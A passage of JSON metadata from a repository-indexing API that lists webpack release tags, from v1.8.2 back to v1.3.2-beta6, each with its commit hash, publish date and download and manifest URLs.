1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.